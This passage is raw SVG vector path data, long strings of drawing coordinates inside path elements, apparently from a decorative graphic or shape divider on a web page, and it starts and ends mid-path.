1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path 